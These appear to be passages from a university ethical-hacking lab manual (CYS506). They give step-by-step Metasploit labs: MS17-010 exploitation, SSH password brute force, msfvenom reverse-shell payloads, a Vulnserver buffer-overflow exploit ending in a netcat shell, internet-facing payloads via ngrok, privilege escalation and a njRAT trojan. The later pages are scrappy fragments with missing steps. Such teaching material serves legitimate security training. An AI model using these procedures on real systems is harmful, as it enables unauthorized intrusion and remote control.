Exploiting this vulnerability allows an attacker to remotely execute code on a vulnerable

system without user authentication. The attacker can then take complete control of the targeted
system, steal data, install malware, or use the compromised system as a foothold to launch
further attacks within the network.
The MS17-010 vulnerability can be exploited using a number of methods, including the
popular Psexec tool. Psexec is a legitimate and widely used remote administration tool that can
be used to remotely execute processes on a target system. However, in the hands of an attacker,
it can also be used to exploit the MS17-010 vulnerability and gain unauthorized access to a
system.
To protect against this vulnerability, Microsoft released a security patch in March 2017.
It is recommended that organizations apply this patch immediately to prevent exploitation of
the MS17-010 vulnerability. Additionally, organizations should also implement best practices
such as disabling SMBv1, segmenting their networks, and using strong passwords to further
reduce the risk of exploitation.

83 | P a g e

1- Start your windows XP machine.
2- On your kali machine, type nmap <Windows XP IP>

84 | P a g e
3- Open Metasploit by typing msfconsole. And type search ms17_010
4- Setup the exploit parameter:

• Set RHOSTS <Windows XP IP>

85 | P a g e
5- Then type exploit. And by now, you gained access to the system.
6- This concludes the demonstration of ms17_010 vulnerability by exploiting SMB.

86 | P a g e

Part 4.12: System Hacking Using SSH Protocol
SSH (Secure Shell) is a protocol used for secure remote access to networked
systems. It is a cryptographic network protocol that provides a secure way to
access a remote system over an unsecured network. SSH provides secure
authentication and encryption of data transferred between the client and the
server.
When a user connects to a remote server using SSH, the server authenticates the
user's identity using various methods such as passwords, public key cryptography,
or two-factor authentication. Once authenticated, the user can execute commands
on the remote system as if they were sitting in front of it. SSH encrypts all data
transmitted between the client and server, providing protection against
eavesdropping and tampering.
Whether or not it is safe to turn on the SSH service depends on the specific use
case and security requirements of the system. SSH itself is a secure protocol, but
as with any networked service, there are risks associated with enabling remote
access to a system. If the system has weak passwords or is otherwise vulnerable
to attack, enabling SSH could increase the risk of unauthorized access.
In general, it is important to follow best practices for securing SSH access, such
as using strong passwords or public key authentication, disabling root login, and
limiting access to trusted users. Additionally, regularly updating the SSH
software to address any known security vulnerabilities is also important to
maintain the security of the service.
1- Turn on your metasploitable machine

87 | P a g e

2- Using nmap scan the target machine, type nmap -p 22 <IP Address>
3- Start Metasploit by typing in the termainal msfconsole, and type search

ssh_login. Then type use 0.

88 | P a g e

4- Setup the attack parameters:
• Set RHOSTS <IP Address of the victim>

• Set PASS_FILE <Path to a password wordlist>
• Set USERNAME msfadmin
• Set STOP_ON_SUCCESS true
• Then type run
5- Now, the brute force is completed and the password is msfadmin.

89 | P a g e

6- The auxiliary model has created a SSH session, type show sessions.
7- Now, type sessions -i <number of the session>
8- This concludes the lab of System Hacking using SSH Protocol.

90 | P a g e

Part 4.13: Hacking MacOS and Linux Systems
Both macOS and Linux are operating systems that belong to the family of Unix-
like operating systems. While they share some similarities, there are also some
key differences between the two.
macOS, previously known as Mac OS X, is the operating system developed by

Apple Inc. for its line of Macintosh computers. It is a proprietary operating system,
meaning that it is developed and distributed exclusively by Apple. macOS is
known for its sleek and intuitive graphical user interface (GUI) that is designed
to be easy to use, even for people who are not technically inclined. It is also known
for its compatibility with a wide range of hardware and software products, which
makes it a popular choice for creative professionals such as designers, video
editors, and musicians.
Linux, on the other hand, is an open-source operating system that is based on the
Unix operating system. It is developed collaboratively by a community of
programmers and is available for free. Linux is known for its stability, security,
and customizability. It is used in a wide range of applications, from servers to
desktop computers to embedded devices like smartphones and routers. Linux is
also popular among developers and programmers because of its command-line
interface (CLI) and the vast array of tools and utilities available to them.
One key difference between macOS and Linux is that macOS is developed and
distributed exclusively by Apple, while Linux is developed collaboratively by a
community of programmers and is available for free. Another difference is that
macOS is designed to run only on Apple hardware, while Linux can run on a wide
range of hardware platforms. Finally, macOS is known for its user-friendly GUI,
while Linux is known for its flexibility and customizability.

91 | P a g e

1- Open a terminal and type, msfvenom --pylaod
python/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=4444 >
Google.py
2- Start Metasploit by typing msfconsol and start setting up the attack

parameter:
• Set PAYLOAD python/meterpreter/reverse_tcp

• Set LHOST <IP Address of the attacker>
• Set LPORT 4444

92 | P a g e

3- Now, type exploit
4- In the other hand, transfer the payload to a MacOS system, and open the
terminal and type python3 <path to the payload>, then press enter

93 | P a g e

5- And by now, you gained access to a MacOS system
6- This concludes the demonstration of hacking MacOS and Linux Systems.

94 | P a g e

Part 4.14: Perform Buffer Overflow Attack to Gain Access to a Remote
System
This task demonstrates the exploitation procedure applied to a vulnerable server

running on the victim’s system. This vulnerable server is attached to Immunity
Debugger. As an attacker, we will exploit this server using malicious script to gain
remote access to the victim’s system.
1- Open any web browser and access the following link and download
Vulnserver (https://github.com/stephenbradshaw/vulnserver). Press on
Download ZIP
2- Go to Downloads > Vulnserver-master > execute vulnserver.exe The

Windows Security Alert window appears; click Allow access.

95 | P a g e

3- Vulnserver starts running, as shown in the screenshot.
4- Open any web browser and access the following link

(https://debugger.immunityinc.com/ID_register.py) and fill the needed
information and press download.
5- The Immunity Debugger Setup: License Agreement window appears; click

the I accept checkbox and then click Next.

96 | P a g e

6- Now, click File in the menu bar, and in the drop-down menu, click Attach.
7- The Select process to attach pop-up appears; click the vulnserver process
and click Attach.
8- Immunity Debugger showing the vulnerserver.exe process window

appears, as shown in the screenshot.
9- You can observe that the status is Paused in the bottom-right corner of the
window.

97 | P a g e

10- Click on the Run program icon ( ) in the toolbar to run Immunity.
11- Keep Immunity Debugger and Vulnserver running, and switch to the Kali
Linux virtual machine.
12- In the Terminal window, type nc -nv 10.10.10.10 9999 and press Enter.
Note: Here, 10.10.10.10 is the IP address of the target machine (Windows

10) and 9999 is the target port. Check your host IP that runs the vulnserver.
13- Type HELP and a list of Valid Commands is displayed, as shown in the
screenshot.
14- Open the following link to download (fuzz.py) (https://udksa-

my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/EdxBLJpQCAF
AnWxr0J0NHtMBsgmgc5mTVbemI4d_2kbbWQ?e=tUhr3C)
15- In the terminal Type python3 fuzz.py, then provide your vunlserver IP
address.
16- A message appears, saying that the vulnerable server crashed after
receiving approximately 43800 bytes of data, but it did not overwrite the
EIP register.
Note: The byte size might differ in your lab environment.

98 | P a g e
17- Re-launch both Immunity Debugger and the vulnerable server as an

administrator. Now, Attach the vulnserver process to Immunity Debugger and
click the Run program icon ( ) in the toolbar to run Immunity Debugger.
18- Through fuzzing, we have understood that we can overwrite the EIP register
with 1 to 5100 bytes of data. Now, we will use the pattern_create Ruby tool to
generate random bytes of data.
19- In the Terminal window, type /usr/share/metasploit-

framework/tools/exploit/pattern_create.rb -l <number of bytes that
caused a crash + 100>and press Enter.
Note: -l: length, 34900: byte size (here, we take the nearest even-number value
of the byte size obtained in the previous step)
20- It will generate a random piece of bytes; right-click on it and click Copy to
copy the code and close the Terminal window.

99 | P a g e
21- Now, download attack.py from (https://udksa-

my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/EWK_1i2FOLJ
PvuU4c3U4CQsBROb_ntfH5O311uppE_RAhw?e=ELAmcB), and type in
the terminal mousepad attack.py
22- Paste the data generated in step 20 in offset variable, then save the file.

100 | P a g e
23- In the terminal, type python3 attack.py, then provide vulnserver IP.
24- In the Immunity Debugger window, you can observe that the EIP register is
overwritten with random bytes. Note down the random bytes in the EIP and
find the offset of those bytes.

101 | P a g e

framework/tools/exploit/pattern_offset.rb -l 34900 -q 386F4337 and press
Enter.
Note: the offset here (386F4337) depends on the result you got from
the immunity debugger EIP register value.
26- A result appears, indicating that the identified EIP register is at an offset of
2003 bytes, as shown in the screenshot.
27- Now, download overwrite.py from (https://udksa-

my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/EUNEYal3w4RM
u48nGEjMJLQBrGUb2O0GpdxCtWWBJKKdvg?e=K9WSSG)

29- Open overwrite.py and remove the offset 2003 with the offset you got in the
analysis. Then, type in the terminal python3 overwrtie.py

102 | P a g e
30- Switch to the Windows 10. You can observe that the EIP register is
overwritten, as shown in the screenshot.
Note: The result indicates that the EIP register can be controlled and overwritten
with malicious shellcode.

103 | P a g e

32- Now, before injecting the shellcode into the EIP register, first, we must
identify bad characters that may cause issues in the shellcode.
Note: You can obtain the badchars through a Google search. Characters such as
no byte, i.e., “\x00”, are badchars.
33- Now, download badchars.py from (https://udksa-
my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/ETu0cgx7FFtNtH
egVWLFfbEBHAhzVpVHGY2cV2mFYwzXGw?e=W3owh5), and don’t forget
to change the offset 2003 with the one you got during the analysis.
34- In the terminal, type python3 badchars.py
35- Switch to the Windows 10.

36- In Immunity Debugger, click on the ESP register value in the top-right
window. Right-click on the selected ESP register value and click the
Follow in Dump option.
37- In the left-corner window, you can observe that there are no badchars that
cause problems in the shellcode, as shown in the screenshot.

104 | P a g e

administrator. Now, Attach the vulnserver process to Immunity Debugger.
39- Now, download mona.py from (https://udksa-

my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/EYo0c_q7YDtCo
bLsaQgGBwYBAApVCd5W3Z2T6syCqlvvpQ?e=qkROm6)
40- copy the mona.py script, and paste it in the location C:\Program Files
(x86)\Immunity Inc\Immunity Debugger\PyCommands.
41- Switch to the Immunity Debugger window. In the text field present at
bottom of the window, type !mona modules and press Enter.

105 | P a g e
42- The Log data pop-up window appears, which shows the protection settings of
various modules.
43- You can observe that there is no memory protection for the module
essfunc.dll, as shown in the screenshot.
44- Now, we will exploit the essfunc.dll module to inject shellcode and take full
control of the EIP register.
framework/tools/exploit/nasm_shell.rb and press Enter.
Note: This script is used to convert assembly language into hex code.
46- The nasm command line appears; type JMP ESP and press Enter.
47- The result appears, displaying the hex code of JMP ESP (here, FFE4).
Note: Note down this hex code value.

106 | P a g e
48- Type Exit, and Switch back to the Windows 10.

49- In the Immunity Debugger window, type !mona find -s “\xff\xe4” -m
essfunc.dll and press Enter in the text field present at the bottom of the
window.
50- The result appears, displaying the return address of the vulnerable module, as
shown in the screenshot.
Note: Here, the return address of the vulnerable module is 0x625011af, which
might differ in your lab environment.
51- Close Immunity Debugger and the vulnerable server process.

administrator. Now, Attach the vulnserver process to Immunity Debugger.
53- In the Immunity Debugger window, click the Go to address in
Disassembler icon ( ).

107 | P a g e
54- The Enter expression to follow pop-up appears; enter the identified return
address in the text box (here, 625011af) and click OK.
55- You will be pointed to 625011af ESP; press F2 to set up a breakpoint at the
selected address, as shown in the screenshot.
56- Now, click on the Run program icon ( ) in the toolbar to run Immunity.
57- Now switch to kali Linux and, download jump.py from (https://udksa-
my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/EQrum-
AoNLpJn66W4AfnLiYB5CJF1UsjVtgtR5kt-h3J-w?e=Nh5DRr)
58- In the Terminal, type python3 jump.py

108 | P a g e
59- In the Immunity Debugger window, you will observe that the EIP register
has been overwritten with the return address of the vulnerable module, as
shown in the screenshot.
Note: You can control the EIP register if the target server has modules without
proper memory protection settings.
60- Close Immunity Debugger and the vulnerable server process.

61- Re-launch both Immunity Debugger and the vulnerable server
62- Switch to kali Linux
63- In the Terminal window, use the following command and press Enter to
generate the shellcode. msfvenom -p windows/shell_reverse_tcp
LHOST=<Local IP Address> LPORT=<Listening Port> EXITFUNC=thread
-f c -a x86 -b “\x00”
Note: Here, -p: payload, local IP address: 10.10.10.13, listening port: 4444., - f:
filetype, -a: architecture, -b: bad character.
64- A shellcode is generated, as shown in the screenshot.
65- Select the code, right-click on it, and click Copy to code the code.

109 | P a g e
66- Now, download shellcode.py from (https://udksa-

my.sharepoint.com/:u:/g/personal/2190002489_iau_edu_sa/Ee2FaFNs-
1VAnaj8S6EHYpcB1GfXo1Lvyhpi4V3C39-kbA?e=mNCDes)
67- Type mousepad shellcode.py, then shellcode.py file appears in the text
editor window, as shown in the screenshot
68- Now, paste the shellcode copied in Step#65 in the overflow option (Line 4);
then, press Ctrl+S to save the file and close it.

110 | P a g e
69- In the Terminal window, type nc -nvlp 4444 and press Enter. Netcat will start
listening on port 4444, as shown in the screenshot.
70- Switch back to the other Terminal window. Type chmod +x shellcode.py and
press Enter to change the mode to execute the Python script.
71- Type ./shellcode.py and press Enter to execute the Python script.

111 | P a g e
72- Now, switch back to the Terminal running the Netcat command.
73- You can observe that shell access to the target vulnerable server has been
established, as shown in the screenshot.
74- Now, type whoami and press Enter to display the username of the current
user.
75- This concludes the demonstration of performing a buffer overflow attack to

gain access to a remote system.

112 | P a g e

CYS 506 - Lab5

Uploaded by

Document Information

Original Description:

Copyright

Available Formats

Share this document

Share or Embed Document

Sharing Options

Did you find this document useful?

Is this content inappropriate?

Copyright:

Available Formats

CYS 506 - Lab5

Uploaded by

Copyright:

Available Formats

College of Computer Science and Information Technology

‫كلية علوم الحاسب وتقنية المعلومات‬

Networks and Communications

Student Procedural Manual

Practical Session Plan

Session Topic/Title Session No. Session Duration

1. Outcome A: Bypassing access controls to gain access to the system (such as

CYS506 - Ethical Hacking

Practical Session Plan

1- In the Kali Terminal, type msfvenom -p windows/meterpreter/reverse_tcp

2- This will generate Test.exe, a malicious file, on Desktop, as shown in the

CYS506 - Ethical Hacking

Practical Session Plan

• Type mkdir /var/www/html/share and press Enter to create a

Note: Here, we are sending the malicious payload through a shared

CYS506 - Ethical Hacking

Practical Session Plan

5- Type msfconsole and press Enter to launch the Metasploit framework.

CYS506 - Ethical Hacking

Practical Session Plan

• Type set payload windows/meterpreter/reverse_tcp and press Enter.

CYS506 - Ethical Hacking

Practical Session Plan

CYS506 - Ethical Hacking

Practical Session Plan

Note: If the Meterpreter shell is not automatically connected to the session,

CYS506 - Ethical Hacking

Practical Session Plan

CYS506 - Ethical Hacking

Practical Session Plan

Note: PowerUp.ps1 is a program that enables a user to perform quick checks

21- A result appears, displaying vulnerabilities in unquoted service paths,

CYS506 - Ethical Hacking

Practical Session Plan

CYS506 - Ethical Hacking

Practical Session Plan

• You can follow this tutorial to set up Ngrok: https://youtu.be/LYmhwKVNjk4

2- Fill the needed information.

CYS506 - Ethical Hacking

Practical Session Plan

5- Move to download folder in Kali Linux

CYS506 - Ethical Hacking

Practical Session Plan

8- Now, in the terminal type ./ngrok tcp 4444

9- In a new terminal type msfvenom -p windows/meterpreter/reverse_tcp --platform

CYS506 - Ethical Hacking

Practical Session Plan

CYS506 - Ethical Hacking

Practical Session Plan

11- this concludes our lab on hacking devices on the internet.

CYS506 - Ethical Hacking

Practical Session Plan

A computer Trojan is a program with malicious or harmful code contained inside

Installing additional malware: njRAT can be used to download and install

CYS506 - Ethical Hacking

Practical Session Plan

2- Click on njRAT Green Edidtion to start download.

CYS506 - Ethical Hacking

Practical Session Plan

CYS506 - Ethical Hacking

Practical Session Plan

CYS506 - Ethical Hacking

Practical Session Plan